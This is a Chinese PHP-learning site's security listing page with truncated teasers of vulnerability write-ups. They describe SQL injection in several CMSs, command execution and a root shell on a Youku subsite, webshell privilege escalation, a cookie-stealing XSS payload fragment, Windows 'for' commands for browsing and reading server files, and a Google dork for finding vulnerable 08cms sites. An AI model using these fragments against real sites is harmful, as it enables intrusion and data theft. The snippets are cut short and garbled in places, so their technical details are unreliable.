欢迎来到[自学php网] ①群 287460651

ECSHOP后台注入 - 网站安全 - 自学php关注热度:19

ECSHOP 后台注入漏洞 刚挖的 热乎的。。之前分次提交是因为 一边挖一边提交的admin favourable phpif ($_REQUEST[ 39;act 39;] == 39;list 39;){ admin_priv( 39;favourable 39;);function..[详情]

YXcmsApp注入 - 网站安全 - 自学php关注热度:42

这楼的没啥技术含量，本菜鸟刚接触代码审计，可能分析的不对。漏洞文件protected apps default controller indexController php关键代码public function search(){ if(empty($_GET[ 39;keywords..[详情]

瑞丽网APP应用API接口又一处注射 - 网站安全 - 自关注热度:21

瑞丽网IPHONE端 APP应用接口存在注入，可能会导致用户信息受到威胁，通过漏洞可以通过变量读取服务器信息，望管理员速度修复,防止被他人恶意利用。POST rlw getTopic php HTTP 1 1Host: api r..[详情]

优酷某分站命令执行漏洞(已证明可内网渗透) -关注热度:24

优酷某分站命令执行漏洞可SHELL，可内网渗透Target: http: channel 3g youku com ykmks login doWhoami: rootWebPath: opt www ykmks webapps ykmksOS Name: LinuxOS Version: 2 6 18-194 el5Java Home:..[详情]

新网虚拟主机提权 - 网站安全 - 自学php关注热度:49

手头有个新网虚拟主机的webshell，想提权，一直未果，也搜索不到任何有价值的信息。貌似讨论新网提权的很少。貌似是新网的虚拟主机吧，俺也不清楚，对照下图的表： 80%的确定是新..[详情]

for命令跨目录 读文件 写文件 - 网站安全 - 自学关注热度:37

c for d %i in (D: VirtualHost 8090sec www *) do @echo %i 列目录 c for r D: VirtualHost 8090sec www %i in (* *) do @echo %i 浏览目录 c for f %c in (D: VirtualHo..[详情]

防止.NET木马列所有站物理路径，aspxspy木马简单防关注热度:34

aspxspy 此木马是一个 NET程序制作，如果你的服务器支持 NET那就要注意了，进入木马有个功能叫：IIS Spy，点击以后可以看到所有站点所在的物理路径。以前有很多人提出过，但一直没有人..[详情]

php安全模式详细介绍 - 网站安全 - 自学php关注热度:33

php ini中找safe_modephp安全模式：safe_mode=on|off启用safe_mode指令将对在共享环境中使用PHP时可能有危险的语言特性有所限制。on启用，off禁用。它会比较执行脚本UID（用户ID）和脚本尝试访问..[详情]

ThinkSNS修改任意账号用户名和密码（包括管理员）关注热度:31

由于某处修改未做判断，导致直接可以修改用户账号信息(包括管理员)更换邮箱激活-修改任何uid的邮箱-登陆-使用修改的那个邮箱找回密码由于index php?app=publicmod=Registeract=changeActivationE..[详情]

Destoon全版本通杀SQL注入2 - 网站安全 - 自学php关注热度:17

个人觉得不应该仅仅只检测用户的输入，而应该在SQL查询前进行检测才能更好的起到防注入的效果吧，因为人总是有遗漏的。common inc php 0x00if(!empty($_SERVER[ 39;REQUEST_URI 39;])) strip_uri($_SER..[详情]

PHPCMS最新版存储型xss（附多种利用方法） - 网站关注热度:22

PHPCMS文章投稿处存在存储型的XSS漏洞,也许当你看到标题的时候,你心里会想：楼主简直太不厚道了,不就一个XSS嘛,标题却来个代码执行 别慌,一个漏洞所造成的威胁,本人觉得并不在于其本..[详情]

撞库攻击：一场需要用户参与的持久攻防战 - 网关注热度:31

一、背景：用户数据泄露一直是如今互联网世界的一个焦点，从最近的京东撞库抹黑事件，到之前的CSDN，如家用户数据的泄露，服务商和黑客之间在用户数据这个舞台上一直在进行着旷..[详情]

人人网某分站存储型xss第二弹 - 网站安全 - 自学关注热度:31

存储型xss，可打cookie，引用某牛的话勿头痛医头脚痛医脚详细说明：http: dellcqg renren com Qa ask 单引号被转义构造img src=1 onerror=document body appendChild(document createElement(String fromCh..[详情]

洽洽食品某系统IIS配置不当导致任意代码执行关注热度:29

IIS配置不当致使任意代码执行，旗下多站沦陷，上市公司大量采购、财务数据可查其实问题很简单1 WEB服务器扩展里设置WebDAV为允许2 网站权限配置里开启了写入权限http: iservice qiaqiafoo..[详情]

08cms通用oday - 网站安全 - 自学php关注热度:37

通杀08cms所有版本通用型SQL注射谷歌关键字inurl:member index php?ugid31=51在网站后面加上 admina php就是后台随便找个站点就可以注射官方的演示站点也可以秒进后台http: auto 08cms com member index..[详情]